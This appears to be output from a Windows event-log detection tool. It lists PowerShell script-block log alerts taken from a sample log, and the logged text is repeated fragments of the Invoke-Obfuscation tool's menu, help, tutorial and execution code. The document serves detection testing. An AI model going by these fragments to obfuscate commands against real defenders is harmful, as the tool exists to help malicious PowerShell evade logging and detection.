""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. 
If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. 
If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. 
Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. 
If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
